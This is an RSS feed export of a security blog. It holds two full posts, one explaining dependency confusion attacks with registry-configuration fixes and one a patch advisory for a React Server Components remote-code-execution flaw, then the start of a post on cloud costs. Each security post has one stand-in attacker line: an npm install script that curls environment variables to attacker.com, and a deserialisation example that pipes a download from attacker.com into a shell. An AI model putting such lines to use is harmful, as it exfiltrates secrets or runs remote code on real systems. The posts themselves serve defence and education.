<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Jacob Alcock - Security & Development]]></title><description><![CDATA[Jacob Alcock - Security & Development]]></description><link>https://blog.jacobalcock.co.uk</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1762469624729/0e37fdd0-5768-46d6-ad25-dcf8553f5519.png</url><title>Jacob Alcock - Security &amp; Development</title><link>https://blog.jacobalcock.co.uk</link></image><generator>RSS for Node</generator><lastBuildDate>Wed, 15 Apr 2026 17:53:30 GMT</lastBuildDate><atom:link href="https://blog.jacobalcock.co.uk/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Dependency Confusion Attacks: How Package Names Steal Your Code]]></title><description><![CDATA[Dependency confusion attacks happen because package managers default to checking public registries, even when you're using private packages. Attackers upload malicious code with internal package names. Your CI/CD pulls and executes attacker code.
The...]]></description><link>https://blog.jacobalcock.co.uk/dependency-confusion-attacks-how-package-names-steal-your-code</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/dependency-confusion-attacks-how-package-names-steal-your-code</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[Devops]]></category><category><![CDATA[Developer]]></category><category><![CDATA[npm]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Tue, 06 Jan 2026 10:27:15 GMT</pubDate><content:encoded><![CDATA[<p>Dependency confusion attacks happen because package managers default to checking public registries, even when you're using private packages. Attackers upload malicious code with internal package names. Your CI/CD pulls and executes attacker code.</p>
<p>The fix is simple: configure package managers correctly. Most companies don't.</p>
<h1 id="heading-how-dependency-confusion-works"><strong>How Dependency Confusion Works</strong></h1>
<p><strong>Step 1: Company uses internal packages</strong></p>
<p>Company has private npm packages for shared code:</p>
<ul>
<li><p><code>@mycompany/auth</code></p>
</li>
<li><p><code>@mycompany/api-client</code></p>
</li>
<li><p><code>@mycompany/utils</code></p>
</li>
</ul>
<p>These live in a private npm registry (JFrog Artifactory, npm Enterprise, AWS CodeArtifact).</p>
<p><strong>Step 2: Developer configuration</strong></p>
<p><code>package.json</code>:</p>
<pre><code class="lang-plaintext">{
  "dependencies": {
    "@mycompany/auth": "^1.2.3",
    "express": "^4.18.0"
  }
}
</code></pre>
<p><strong>Step 3: Attacker discovers internal package names</strong></p>
<p>Via:</p>
<ul>
<li><p>Leaked <code>package.json</code> in public GitHub repos</p>
</li>
<li><p>Error messages mentioning package names</p>
</li>
<li><p>Former employees disclosing names</p>
</li>
<li><p>Social engineering</p>
</li>
</ul>
<p><strong>Step 4: Attacker publishes to public npm</strong></p>
<p>Attacker creates <code>@mycompany/auth</code> on public npm with version <code>999.999.999</code>.</p>
<p><strong>Step 5: Package manager downloads attacker's package</strong></p>
<p>npm (without proper configuration) checks public registry. Finds <code>@mycompany/auth@999.999.999</code> (higher version than internal <code>1.2.3</code>). Downloads and installs malicious package.</p>
<p><strong>Step 6: Code execution</strong></p>
<p>Package has <code>install</code> script:</p>
<pre><code class="lang-plaintext">{
  "scripts": {
    "install": "curl https://attacker.com/steal?data=$(env)"
  }
}
</code></pre>
<p>On <code>npm install</code>, this executes. Attacker gets:</p>
<ul>
<li><p>Environment variables (API keys, tokens, credentials)</p>
</li>
<li><p>Source code access (if running in CI/CD)</p>
</li>
<li><p>Network access to internal systems</p>
</li>
</ul>
<h1 id="heading-alex-birsan-research"><strong>Alex Birsan Research</strong></h1>
<p>Alex Birsan demonstrated this attack in 2021, earning $130k in bug bounties.</p>
<p><strong>Targets</strong>: Over 35 companies including Apple, Microsoft, Netflix, Yelp, Tesla</p>
<p><strong>Method</strong>:</p>
<ol>
<li><p>Identified internal package names from public sources</p>
</li>
<li><p>Published packages to public npm/PyPI with same names</p>
</li>
<li><p>Used high version numbers (999.999.999) to ensure precedence</p>
</li>
<li><p>Added telemetry to track installations</p>
</li>
<li><p>Reported to affected companies</p>
</li>
</ol>
<p><strong>Results</strong>:</p>
<ul>
<li><p>Thousands of downloads from major tech companies</p>
</li>
<li><p>Code executed in CI/CD pipelines</p>
</li>
<li><p>Access to internal networks, credentials, source code</p>
</li>
<li><p>$130k in bounty payouts</p>
</li>
</ul>
<p>This wasn't a sophisticated exploit. It was package manager configuration doing exactly what it was told to do - just not what companies intended.</p>
<h1 id="heading-why-package-managers-do-this"><strong>Why Package Managers Do This</strong></h1>
<p><strong>npm behavior</strong>:</p>
<pre><code class="lang-plaintext">npm install @mycompany/auth
</code></pre>
<p>npm checks (in order):</p>
<ol>
<li><p>Local cache</p>
</li>
<li><p>Configured registries</p>
</li>
<li><p>Public npm registry (default)</p>
</li>
</ol>
<p>If <code>@mycompany/auth</code> exists in public npm with a higher version than private registry, npm installs the public version.</p>
<p><strong>pip behavior</strong> (Python):</p>
<pre><code class="lang-plaintext">pip install company-internal-package
</code></pre>
<p>pip checks whatever indexes are configured. With <code>--extra-index-url</code>, PyPI and the private index are treated as equals: if both have the package, the highest version wins.</p>
<p><strong>RubyGems, Maven, NuGet</strong>: Similar behavior. Public registries are default or fallback.</p>
<p>This isn't a bug. It's designed behavior. The problem is companies don't configure registry precedence correctly.</p>
<h1 id="heading-why-this-persists"><strong>Why This Persists</strong></h1>
<p><strong>Default configurations are insecure</strong></p>
<p>Out of the box, package managers check public registries. Developers must explicitly configure private registry precedence.</p>
<p>Most don't.</p>
<p><strong>No namespace protection</strong></p>
<p>Anyone can publish <code>@yourcompany/package-name</code> to public npm if the <code>@yourcompany</code> scope hasn't been claimed. Package managers don't verify that a scope belongs to your company.</p>
<p>npm scopes (<code>@scopename</code>) aren't a security control by themselves. They're just namespaces - unless you register the matching organisation on public npm, an attacker can claim the scope and publish under your company's name.</p>
<p><strong>Version number precedence</strong></p>
<p>Package managers use semantic versioning. <code>999.999.999</code> beats <code>1.2.3</code>.</p>
<p>Attackers exploit this by publishing absurdly high version numbers.</p>
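<p>A quick sketch of why the absurd version wins (naive numeric comparison; real package managers implement full semver, including prerelease rules):</p>
<pre><code class="lang-javascript">// Sketch: naive x.y.z comparison. Real resolvers implement full semver
// (prerelease tags, build metadata); this only shows the core ordering.
function isNewer(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  for (let i = 0; i !== 3; i += 1) {
    if (pa[i] !== pb[i]) {
      return Math.sign(pa[i] - pb[i]) === 1;
    }
  }
  return false;
}

console.log(isNewer('999.999.999', '1.2.3')); // true
</code></pre>
<p>Version-for-version, a legitimate internal <code>1.2.3</code> never stands a chance against a malicious <code>999.999.999</code>.</p>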
<p><strong>Lack of awareness</strong></p>
<p>Developers don't understand package manager resolution order. They assume "we use a private registry" means package managers won't check public registries.</p>
<p>Wrong.</p>
<p><strong>CI/CD inherits developer configurations</strong></p>
<p>Developer machine might be configured correctly. CI/CD pipeline uses a generic Docker image with default npm config.</p>
<p>CI/CD pulls from public registry. Attacker code executes in pipeline with access to production credentials.</p>
<p><strong>No auditing</strong></p>
<p>Companies don't monitor which registries packages are downloaded from. Malicious packages get installed without detection.</p>
<h1 id="heading-attack-scenarios"><strong>Attack Scenarios</strong></h1>
<p><strong>Scenario 1: CI/CD credential theft</strong></p>
<p>Company uses <code>@mycompany/deploy-utils</code> for deployment scripts. Package has access to AWS credentials in environment variables.</p>
<p>Attacker publishes malicious <code>@mycompany/deploy-utils</code> to public npm. CI/CD pipeline installs it. <code>postinstall</code> script exfiltrates AWS credentials to attacker server.</p>
<p>Attacker has production AWS access.</p>
<p><strong>Scenario 2: Source code exfiltration</strong></p>
<p>Internal package <code>@company/build-tools</code> runs during build. Has access to entire source code.</p>
<p>Attacker publishes malicious version. Build process installs it. Package uploads source code to attacker server.</p>
<p>Company IP is stolen.</p>
<p><strong>Scenario 3: Backdoor deployment</strong></p>
<p>Package <code>@company/auth-middleware</code> is used in production applications.</p>
<p>Attacker publishes malicious version with backdoor. Next deployment pulls attacker package. Backdoor ships to production.</p>
<p>Production compromised.</p>
<h1 id="heading-npm-scope"><strong>npm Scope</strong></h1>
<p>npm scopes like <code>@mycompany</code> seem like they provide isolation. They don't.</p>
<pre><code class="lang-plaintext">npm install @mycompany/auth
</code></pre>
<p>This will install from public npm if that package exists there, regardless of whether you have a private registry with the same package.</p>
<p><strong>The fix</strong>:</p>
<p><code>.npmrc</code>:</p>
<pre><code class="lang-plaintext">@mycompany:registry=https://private-registry.company.com
</code></pre>
<p>This tells npm: "For packages in <code>@mycompany</code> scope, only use this registry."</p>
<p>Most companies don't configure this.</p>
<h1 id="heading-pips-problem"><strong>pip’s Problem</strong></h1>
<p>Python's <code>pip</code> has similar issues with PyPI.</p>
<p><strong>Attack</strong>:</p>
<pre><code class="lang-plaintext">pip install company-internal-utils
</code></pre>
<p>If <code>company-internal-utils</code> exists on both private repository and PyPI, pip might install from PyPI depending on configuration.</p>
<p><strong>The fix</strong>:</p>
<p><code>pip.conf</code>:</p>
<pre><code class="lang-plaintext">[global]
index-url = https://private-repo.company.com/simple/
</code></pre>
<p>Or use <code>--index-url</code> flag explicitly.</p>
<p>Again, most companies rely on default behavior.</p>
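<p>Hash-pinning adds a second line of defence: in pip's hash-checking mode, an install aborts if the downloaded artifact doesn't match the recorded hash, even if resolution picked the wrong index. A sketch of a <code>requirements.txt</code> fragment (the hash value is a placeholder):</p>
<pre><code class="lang-plaintext"># Install with: pip install --require-hashes -r requirements.txt
company-internal-utils==1.4.2 \
    --hash=sha256:placeholder-replace-with-the-real-artifact-hash
</code></pre>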
<h1 id="heading-detection"><strong>Detection</strong></h1>
<p><strong>How do you know if you're vulnerable?</strong></p>
<ol>
<li><p>Do you use internal packages?</p>
</li>
<li><p>Are those package names secret or publicly known?</p>
</li>
<li><p>Is your package manager configured to prioritise private registry?</p>
</li>
<li><p>Are CI/CD pipelines configured the same as developer machines?</p>
</li>
</ol>
<p>If you answer "I don't know" to any of these, you're probably vulnerable.</p>
<p><strong>Monitoring</strong>:</p>
<p>Check where packages are downloaded from:</p>
<pre><code class="lang-plaintext">npm config get registry
</code></pre>
<p>Audit installed packages against expected sources. But this requires tooling most companies don't have.</p>
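<p>One lightweight check you can script yourself: scan <code>package-lock.json</code> for scoped packages that resolved from anywhere other than your private registry. A sketch (the scope and registry URLs are hypothetical placeholders):</p>
<pre><code class="lang-javascript">// Sketch: flag scoped lockfile entries that were NOT resolved from the
// private registry. Scope and registry URLs are hypothetical placeholders.
function findConfused(lock, scope, privateBase) {
  const offenders = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!path.includes(scope) || !meta || !meta.resolved) continue;
    if (!meta.resolved.startsWith(privateBase)) {
      offenders.push({ path, resolved: meta.resolved });
    }
  }
  return offenders;
}

// Example lockfile fragment: the scoped package sneaked in from public npm.
const lock = {
  packages: {
    'node_modules/@mycompany/auth': {
      resolved: 'https://registry.npmjs.org/@mycompany/auth/-/auth-999.999.999.tgz',
    },
  },
};
console.log(findConfused(lock, '@mycompany/', 'https://private-registry.company.com/'));
</code></pre>
<p>Run something like this in CI and fail the build on a non-empty result.</p>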
<h1 id="heading-final-thoughts"><strong>Final Thoughts</strong></h1>
<p>Dependency confusion is a simple attack with devastating impact. It exploits default package manager behavior that most developers don't understand.</p>
<p>The fix is trivial: configure registry precedence correctly. Most companies don't because:</p>
<ul>
<li><p>Complexity</p>
</li>
<li><p>Lack of awareness</p>
</li>
<li><p>No ownership</p>
</li>
<li><p>Works until it doesn't</p>
</li>
</ul>
<p>Alex Birsan made $130k in bounties demonstrating this. How many attackers have exploited it without disclosing?</p>
<p>You're probably vulnerable right now. Your build pipelines are likely pulling packages from public registries without verification.</p>
<p>Check your <code>.npmrc</code>. If you don't have scope restrictions configured, you're one package name discovery away from being compromised.</p>
<p>The supply chain attack surface is massive. Dependency confusion is one of the easiest exploits.</p>
<p>Fix your package manager configs. Before someone else publishes <code>@yourcompany/auth-utils</code> to public npm.</p>
]]></content:encoded></item><item><title><![CDATA[Critical Vulnerability in React Server Components (CVE-2025-55182)]]></title><description><![CDATA[UPDATE: December 3, 2025 - A critical pre-authentication Remote Code Execution (RCE) vulnerability has been disclosed in React Server Components. This is a CVSS 10.0 vulnerability. If you're running Next.js 15.x, 16.x, or React 19.x in production, st...]]></description><link>https://blog.jacobalcock.co.uk/critical-vulnerability-in-react-server-components-cve-2025-55182</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/critical-vulnerability-in-react-server-components-cve-2025-55182</guid><category><![CDATA[React]]></category><category><![CDATA[Security]]></category><category><![CDATA[Next.js]]></category><category><![CDATA[CVE]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Wed, 03 Dec 2025 00:00:00 GMT</pubDate><content:encoded><![CDATA[<p><strong>UPDATE: December 3, 2025</strong> - A critical pre-authentication Remote Code Execution (RCE) vulnerability has been disclosed in React Server Components. This is a <strong>CVSS 10.0</strong> vulnerability. If you're running Next.js 15.x, 16.x, or React 19.x in production, <strong>stop reading and patch immediately</strong>.</p>
<h2 id="heading-the-issue">The Issue</h2>
<p><strong>Affected:</strong></p>
<ul>
<li><p>React 19.0.0, 19.1.0, 19.1.1, 19.2.0</p>
</li>
<li><p>Next.js 15.x and 16.x (all versions using App Router)</p>
</li>
<li><p>Experimental canary releases starting with Next.js 14.3.0-canary.77</p>
</li>
</ul>
<p><strong>Patched versions:</strong></p>
<ul>
<li><p><strong>React:</strong> 19.0.1, 19.1.2, 19.2.1</p>
</li>
<li><p><strong>Next.js:</strong> 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7</p>
</li>
</ul>
<p><strong>Vulnerability:</strong> Pre-authentication remote code execution via unsafe deserialisation in Server Function endpoints</p>
<p><strong>CVSS Score:</strong> 10.0 (Critical)</p>
<p><strong>CVE ID:</strong> CVE-2025-55182 (React), CVE-2025-66478 (Next.js)</p>
<h2 id="heading-how-to-update">How to Update</h2>
<h3 id="heading-if-youre-using-nextjs">If you're using Next.js:</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Check your current version</span>
npm list next

<span class="hljs-comment"># Update to the latest patched version for your major version</span>
npm install next@15.5.7  <span class="hljs-comment"># For Next.js 15.x</span>
npm install next@16.0.7  <span class="hljs-comment"># For Next.js 16.x</span>

<span class="hljs-comment"># Verify the update</span>
npm list next
</code></pre>
<h3 id="heading-if-youre-using-react-directly-with-server-components">If you're using React directly with Server Components:</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Update to patched React versions</span>
npm install react@19.2.1 react-dom@19.2.1

<span class="hljs-comment"># Also update the affected server packages</span>
npm install react-server-dom-webpack@19.2.1
npm install react-server-dom-turbopack@19.2.1
npm install react-server-dom-parcel@19.2.1
</code></pre>
<h3 id="heading-if-youre-on-nextjs-143-canary-builds">If you're on Next.js 14.3 canary builds:</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Either downgrade to stable 14.x</span>
npm install next@14.2.18

<span class="hljs-comment"># Or downgrade to 14.3.0-canary.76 (last safe canary)</span>
npm install next@14.3.0-canary.76

<span class="hljs-comment"># Or upgrade to a patched 15.x/16.x version</span>
npm install next@15.5.7
</code></pre>
<p><strong>After updating, redeploy immediately.</strong> This isn't a "next deploy cycle" patch.</p>
<h2 id="heading-what-happened">What Happened?</h2>
<p>React Server Components introduced a new attack surface: <strong>Server Functions</strong> (also called Server Actions in Next.js). These are functions you can call from the client that execute on the server.</p>
<p>Here's the simplified architecture:</p>
<pre><code class="lang-jsx"><span class="hljs-comment">// app/actions.js</span>
<span class="hljs-string">'use server'</span>

<span class="hljs-keyword">export</span> <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">saveData</span>(<span class="hljs-params">formData</span>) </span>{
  <span class="hljs-comment">// This runs on the SERVER</span>
  <span class="hljs-keyword">const</span> data = formData.get(<span class="hljs-string">'data'</span>);
  <span class="hljs-keyword">await</span> db.save(data);
}
</code></pre>
<pre><code class="lang-jsx"><span class="hljs-comment">// app/page.js</span>
<span class="hljs-string">'use client'</span>

<span class="hljs-keyword">import</span> { saveData } <span class="hljs-keyword">from</span> <span class="hljs-string">'./actions'</span>

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Page</span>(<span class="hljs-params"></span>) </span>{
  <span class="hljs-keyword">return</span> (
    <span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">form</span> <span class="hljs-attr">action</span>=<span class="hljs-string">{saveData}</span>&gt;</span>
      <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">name</span>=<span class="hljs-string">"data"</span> /&gt;</span>
      <span class="hljs-tag">&lt;<span class="hljs-name">button</span>&gt;</span>Save<span class="hljs-tag">&lt;/<span class="hljs-name">button</span>&gt;</span>
    <span class="hljs-tag">&lt;/<span class="hljs-name">form</span>&gt;</span></span>
  )
}
</code></pre>
<p>When the user submits the form, the client sends an HTTP POST request to a special endpoint on your Next.js server. The server deserialises the request payload and executes the <code>saveData</code> function.</p>
<h2 id="heading-the-vulnerability"><strong>The Vulnerability</strong></h2>
<p>The deserialisation process in React 19.0.0–19.2.0 <strong>unsafely deserialises untrusted HTTP payloads</strong> without proper validation.</p>
<p>An attacker can craft a malicious payload that, when deserialised, executes arbitrary code on your server.</p>
<h2 id="heading-why-this-is-a-100-cvss-the-worst-possible-score">Why This Is a 10.0 CVSS (The Worst Possible Score)</h2>
<p>CVSS 10.0 requires meeting these criteria:</p>
<ul>
<li><p>✅ <strong>Attack Vector: Network (AV:N)</strong> - Exploitable remotely over HTTP</p>
</li>
<li><p>✅ <strong>Attack Complexity: Low (AC:L)</strong> - No special conditions required</p>
</li>
<li><p>✅ <strong>Privileges Required: None (PR:N)</strong> - No authentication needed (pre-auth RCE)</p>
</li>
<li><p>✅ <strong>User Interaction: None (UI:N)</strong> - Fully automated attack</p>
</li>
<li><p>✅ <strong>Scope: Changed (S:C)</strong> - Can compromise beyond the vulnerable component</p>
</li>
<li><p>✅ <strong>Confidentiality Impact: High (C:H)</strong> - Full data exfiltration possible</p>
</li>
<li><p>✅ <strong>Integrity Impact: High (I:H)</strong> - Full system compromise possible</p>
</li>
<li><p>✅ <strong>Availability Impact: High (A:H)</strong> - Complete denial of service possible</p>
</li>
</ul>
<p>An unauthenticated attacker can send <strong>a single HTTP request</strong> to your publicly accessible Next.js application and <strong>execute arbitrary code</strong> on your server. They can:</p>
<ul>
<li><p>Read environment variables (API keys, database credentials, secrets)</p>
</li>
<li><p>Execute system commands</p>
</li>
<li><p>Install backdoors</p>
</li>
<li><p>Exfiltrate your entire database</p>
</li>
<li><p>Pivot to other services on your network</p>
</li>
<li><p>Mine cryptocurrency</p>
</li>
<li><p>Ransom your data</p>
</li>
</ul>
<p>And they can do all of this <strong>without needing an account or any interaction from your users</strong>.</p>
<p>This is as bad as it gets.</p>
<h2 id="heading-how-the-exploit-works">How the Exploit Works</h2>
<h3 id="heading-the-vulnerable-code-path">The Vulnerable Code Path</h3>
<p>React Server Components serialise function arguments and return values using a custom serialisation format. When you call a Server Function from the client:</p>
<ol>
<li><p>Client serialises the arguments into a special payload format</p>
</li>
<li><p>Client sends HTTP POST to <code>/_next/data/...</code> (Next.js) or your Server Function endpoint</p>
</li>
<li><p><strong>Server deserialises the payload</strong> ← THE VULNERABILITY IS HERE</p>
</li>
<li><p>Server executes the function with the deserialised arguments</p>
</li>
<li><p>Server serialises the return value and sends it back</p>
</li>
</ol>
<p>The vulnerability is in <strong>step 3</strong>. The affected React packages (<code>react-server-dom-webpack</code>, <code>react-server-dom-turbopack</code>, <code>react-server-dom-parcel</code>) deserialise the incoming payload without properly validating the data structure.</p>
<h3 id="heading-deserialisation-vulnerabilities">Deserialisation Vulnerabilities</h3>
<p>Unsafe deserialisation is <strong>CWE-502</strong>, one of the most dangerous vulnerability classes in web security. Here's why:</p>
<p>When you deserialise data, you're reconstructing an object from a serialised representation. If the deserialiser doesn't validate the structure, an attacker can craft a payload that:</p>
<ol>
<li><p>Instantiates dangerous classes</p>
</li>
<li><p>Calls methods during object construction</p>
</li>
<li><p>Triggers code execution through property setters or getters</p>
</li>
<li><p>Exploits prototype pollution (in JavaScript)</p>
</li>
</ol>
<p><strong>Classic example (simplified):</strong></p>
<pre><code class="lang-javascript"><span class="hljs-comment">// Unsafe deserialization</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">deserialize</span>(<span class="hljs-params">payload</span>) </span>{
  <span class="hljs-keyword">return</span> <span class="hljs-built_in">eval</span>(<span class="hljs-string">'('</span> + payload + <span class="hljs-string">')'</span>);  
}

<span class="hljs-comment">// Attacker sends:</span>
deserialize(<span class="hljs-string">"({toString: () =&gt; require('child_process').exec('curl attacker.com | sh')})"</span>)
</code></pre>
<p>The React vulnerability is more sophisticated than <code>eval()</code>, but the principle is the same. <strong>Untrusted input is used to construct code or objects without validation</strong>.</p>
<h3 id="heading-why-server-functions-are-high-risk-targets">Why Server Functions Are High-Risk Targets</h3>
<p>Server Functions are attractive targets because:</p>
<ol>
<li><p><strong>Public endpoints:</strong> They're automatically exposed as HTTP endpoints</p>
</li>
<li><p><strong>No built-in rate limiting:</strong> Easy to brute-force or DoS</p>
</li>
<li><p><strong>Direct server access:</strong> Code executes in the same process as your app</p>
</li>
<li><p><strong>Environment variable access:</strong> Can read <code>process.env</code> immediately</p>
</li>
<li><p><strong>No WAF signatures:</strong> This is a new attack surface with no existing WAF rules</p>
</li>
</ol>
<p>If you're using Server Functions for authentication, database writes, or API calls, an attacker can:</p>
<ul>
<li><p>Bypass authentication by calling the function directly</p>
</li>
<li><p>Inject malicious data into your database</p>
</li>
<li><p>Abuse your API keys to attack third-party services</p>
</li>
</ul>
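<p>Because a Server Function is just an HTTP endpoint, it has to validate its own input rather than trust the calling form. A minimal sketch of that idea (the helper name and limits are hypothetical, not a React API):</p>
<pre><code class="lang-javascript">// Sketch (hypothetical helper, not a React API): Server Function input is
// untrusted HTTP input, so validate it before touching the database.
function validateSaveInput(raw) {
  if (typeof raw !== 'string') {
    throw new TypeError('expected a string');
  }
  const trimmed = raw.trim();
  // Reject empty input and anything longer than 10,000 characters
  // (slice(10000) is non-empty only when the string exceeds that length).
  if (trimmed === '' || trimmed.slice(10000) !== '') {
    throw new RangeError('payload length out of bounds');
  }
  return trimmed;
}

console.log(validateSaveInput('  hello  ')); // hello
</code></pre>
<p>The same goes for authentication: re-check the session inside every Server Function, exactly as you would in a hand-written API route.</p>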
<h2 id="heading-who-is-affected">Who Is Affected?</h2>
<h3 id="heading-you-are-affected-if">You ARE affected if:</h3>
<ul>
<li><p>You're running <strong>Next.js 15.x or 16.x</strong> in production (any version)</p>
</li>
<li><p>You're running <strong>Next.js 14.3.0-canary.77 or later</strong> canary builds</p>
</li>
<li><p>You're using <strong>React 19</strong> with a custom Server Components setup (Remix, Waku, etc.)</p>
</li>
<li><p>You're using the <strong>App Router</strong> in Next.js (the vulnerability is in Server Functions, which are App Router only)</p>
</li>
</ul>
<h3 id="heading-you-are-not-affected-if">You are NOT affected if:</h3>
<ul>
<li><p>You're on <strong>Next.js 14.x stable</strong> (14.0.0 through 14.2.x)</p>
</li>
<li><p>You're on <strong>Next.js 13.x or earlier</strong></p>
</li>
<li><p>You're using <strong>React 18 or earlier</strong></p>
</li>
<li><p>You're using <strong>Pages Router only</strong> (no App Router, no Server Components)</p>
</li>
<li><p>You're using <strong>React 19 with RSC but none of the affected bundlers</strong> (unlikely)</p>
</li>
</ul>
<h2 id="heading-why-this-vulnerability-existed">Why This Vulnerability Existed</h2>
<p>Server Components are <strong>brand new</strong>. React 19 was released in December 2024 (stable) after years in alpha/beta. Next.js 15 shipped in October 2024.</p>
<p>The React team built a novel serialisation protocol to handle:</p>
<ul>
<li><p>Client-to-server function calls</p>
</li>
<li><p>Server-to-client streaming of RSC payloads</p>
</li>
<li><p>Promises, symbols, and complex object graphs</p>
</li>
<li><p>References between client and server</p>
</li>
</ul>
<p>This is <strong>hard</strong>. Really hard. And the security implications weren't fully understood when the feature shipped.</p>
<p><strong>This is not a criticism of the React team.</strong> They responsibly disclosed the vulnerability, shipped patches quickly, and published detailed advisories. This is how responsible disclosure should work.</p>
<p>But it's a reminder: <strong>new features = new attack surface</strong>.</p>
<h2 id="heading-what-nextjs-and-react-could-have-done-better">What Next.js and React Could Have Done Better</h2>
<p><strong>(This is a learning opportunity, not an attack on the teams involved.)</strong></p>
<h3 id="heading-1-server-functions-should-have-been-opt-in">1. Server Functions Should Have Been Opt-In</h3>
<p>Server Functions are <strong>on by default</strong> if you use <code>'use server'</code>. This means every Next.js 15+ App Router application has this attack surface, even if developers don't realize it.</p>
<p><strong>Better approach:</strong></p>
<pre><code class="lang-javascript"><span class="hljs-comment">// next.config.js</span>
<span class="hljs-built_in">module</span>.exports = {
  <span class="hljs-attr">experimental</span>: {
    <span class="hljs-attr">serverActions</span>: <span class="hljs-literal">true</span>  <span class="hljs-comment">// Opt-in</span>
  }
}
</code></pre>
<p>Make dangerous features opt-in, not opt-out.</p>
<h3 id="heading-2-rate-limiting-should-be-built-in">2. Rate Limiting Should Be Built-In</h3>
<p>There's no built-in rate limiting for Server Functions. An attacker can make thousands of requests per second trying different payloads.</p>
<p><strong>Recommended:</strong></p>
<ul>
<li><p>Default rate limit: 100 requests/minute per IP</p>
</li>
<li><p>Configurable in <code>next.config.js</code></p>
</li>
<li><p>Automatically enabled for all Server Functions</p>
</li>
</ul>
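<p>Until something like that ships, rate limiting is on you. A toy in-memory sketch of the idea (illustrative only - production setups typically use a shared store such as Redis):</p>
<pre><code class="lang-javascript">// Sketch: minimal per-IP sliding-window rate limiter (illustrative only).
function makeRateLimiter(maxPerMinute) {
  const hits = new Map(); // ip mapped to an array of request timestamps
  return function allow(ip) {
    const cutoff = Date.now() - 60000;
    // Keep only requests from the last minute.
    const recent = (hits.get(ip) || []).filter(function (t) {
      return Math.sign(t - cutoff) === 1;
    });
    if (recent.length === maxPerMinute) {
      hits.set(ip, recent);
      return false; // over the limit
    }
    recent.push(Date.now());
    hits.set(ip, recent);
    return true;
  };
}

const allow = makeRateLimiter(2);
console.log(allow('1.2.3.4'), allow('1.2.3.4'), allow('1.2.3.4')); // true true false
</code></pre>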
<h3 id="heading-3-content-security-policy-for-server-function-payloads">3. Content Security Policy for Server Function Payloads</h3>
<p>The server should validate the <code>Content-Type</code> and payload structure before deserializing.</p>
<p><strong>Example:</strong></p>
<pre><code class="lang-javascript"><span class="hljs-comment">// Validate before deserializing</span>
<span class="hljs-keyword">if</span> (req.headers[<span class="hljs-string">'content-type'</span>] !== <span class="hljs-string">'application/x-server-function'</span>) {
  <span class="hljs-keyword">return</span> res.status(<span class="hljs-number">400</span>).send(<span class="hljs-string">'Invalid content type'</span>);
}

<span class="hljs-keyword">if</span> (payload.length &gt; MAX_PAYLOAD_SIZE) {
  <span class="hljs-keyword">return</span> res.status(<span class="hljs-number">413</span>).send(<span class="hljs-string">'Payload too large'</span>);
}
</code></pre>
<h3 id="heading-4-security-docs-should-be-prominent">4. Security Docs Should Be Prominent</h3>
<p>The Next.js documentation should have a <strong>Security</strong> section that covers:</p>
<ul>
<li><p>Server Functions are public HTTP endpoints</p>
</li>
<li><p>Input validation is required</p>
</li>
<li><p>Authentication is not automatic</p>
</li>
<li><p>Rate limiting is your responsibility</p>
</li>
</ul>
<p>This information exists but is buried. It should be in the main Server Functions guide.</p>
<h2 id="heading-final-thoughts">Final Thoughts</h2>
<p>Server Components are powerful. They enable features that were impossible or impractical before:</p>
<ul>
<li><p>True server-client composition</p>
</li>
<li><p>Streaming HTML</p>
</li>
<li><p>Zero-bundle components</p>
</li>
<li><p>Direct database access from components</p>
</li>
</ul>
<p>But <strong>power comes with responsibility</strong>. The security model of React fundamentally changed with Server Components, and the ecosystem is still learning the implications.</p>
<p><strong>If you take one thing away from this article:</strong> Update to the patched versions <strong>immediately</strong>. This is a pre-auth RCE with a 10.0 CVSS score. Attackers are scanning for vulnerable Next.js apps right now.</p>
<p>Don't be the next breach headline.</p>
<p><strong>Official advisories:</strong></p>
<ul>
<li><p><a target="_blank" href="https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components">React Security Advisory (CVE-2025-55182)</a></p>
</li>
<li><p><a target="_blank" href="https://www.facebook.com/security/advisories/cve-2025-55182">Meta Security Advisory</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp">Next.js Security Advisory (GHSA-9qr9-h5gf-34mp)</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Cloud Costs Are Destroying Startup Margins]]></title><description><![CDATA[AWS bills that exceed engineering salaries are normal now. Startups with 100,000 users paying $50,000/month for infrastructure that could run on a $200/month dedicated server.
